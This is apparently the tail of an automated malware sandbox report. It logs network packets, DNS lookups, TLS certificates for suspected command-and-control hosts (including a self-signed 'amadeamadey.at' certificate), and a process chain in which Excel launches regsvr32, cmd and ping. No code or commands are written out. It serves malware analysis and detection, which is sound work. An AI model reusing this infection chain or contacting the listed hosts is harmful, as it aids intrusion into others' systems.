Jun 9, 2021 15:21:56.065314054 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065329075 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065345049 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065359116 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065376043 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065381050 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065402985 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065424919 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065438032 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065464973 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065469980 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065486908 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065514088 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.201870918 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201898098 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201925993 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201947927 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201966047 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201992989 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202016115 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202018976 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202038050 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202069044 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202095032 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202202082 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202254057 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202256918 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202275038 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202299118 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202300072 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202317953 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202327013 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202344894 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202353001 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202367067 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202377081 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202392101 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202400923 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202421904 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202423096 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202439070 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202450037 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202466965 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202471018 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202486992 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202507973 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202548027 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202574015 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202599049 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202606916 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202637911 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.207607985 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.207724094 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338391066 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338424921 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338438988 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:38.244496107 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:38.294626951 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:38.999614000 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.059832096 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:39.159909964 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.210349083 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:40.534393072 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:40.584779024 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:42.137758970 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:42.198226929 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:43.285564899 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:43.346214056 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:45.533961058 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:45.584702015 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:49.907931089 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:49.958479881 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.077616930 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.183701038 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.218998909 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.277750969 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.637789011 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.717477083 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:52.668123007 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:52.742284060 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:53.718720913 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:53.776930094 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.219571114 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.279922962 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.392092943 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.444571972 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.776357889 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.835069895 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:56.973902941 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.028814077 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:57.771101952 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.822587013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.385391951 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.440799952 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.850233078 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.908941984 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:05.187127113 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:05.240174055 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:06.356194973 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:06.411145926 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:07.310992002 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:07.364352942 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:08.822825909 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:08.872876883 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:10.216510057 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:10.277961016 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:12.805483103 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:12.879868031 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:33.340646982 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:33.401187897 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:35.480846882 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:35.617012978 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:36.693973064 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:36.752301931 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.430131912 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:37.571043968 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.991182089 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.050961018 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.482630014 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.550734043 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.699526072 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.760968924 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.343851089 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.405417919 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.908086061 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.969800949 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:40.793365002 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:40.852049112 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:41.757324934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:41.818587065 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:42.288892984 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:42.350413084 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:50.255160093 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:50.318708897 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:00.317203999 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:00.378262997 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:16.410259008 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:16.469381094 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:34.410224915 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:34.482976913 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:35.993652105 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:36.063276052 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 9, 2021 15:22:05.833841085 CEST | 192.168.2.6 | 8.8.7.7 | 4d5a | Echo | |
Jun 9, 2021 15:22:10.528872013 CEST | 192.168.2.6 | 8.8.7.7 | 4d59 | Echo | |
Jun 9, 2021 15:22:20.469414949 CEST | 192.168.2.6 | 8.8.7.7 | 4d58 | Echo | |
Jun 9, 2021 15:22:25.029455900 CEST | 192.168.2.6 | 8.8.7.7 | 4d57 | Echo | |
Jun 9, 2021 15:22:36.677659035 CEST | 192.168.2.6 | 8.8.7.7 | 4d56 | Echo | |
Jun 9, 2021 15:22:41.530548096 CEST | 192.168.2.6 | 8.8.7.7 | 4d55 | Echo | |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.219571114 CEST | 192.168.2.6 | 8.8.8.8 | 0x9318 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.279922962 CEST | 8.8.8.8 | 192.168.2.6 | 0x9318 | No error (0) | 107.180.50.232 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.561739922 CEST | 107.180.50.232 | 443 | 192.168.2.6 | 49715 | CN=tpfcu.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 05 15:44:31 CET 2021 | Wed Apr 06 16:44:31 CEST 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
(chain, intermediate) | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
Jun 9, 2021 15:22:49.386614084 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49740 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:25.363224030 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49747 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:57.298791885 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49750 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 15:21:49 |
Start date: | 09/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:55 |
Start date: | 09/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:56 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:03 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:13 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:17 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:18 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:19 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:28 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:35 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:43 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:44 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:51 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|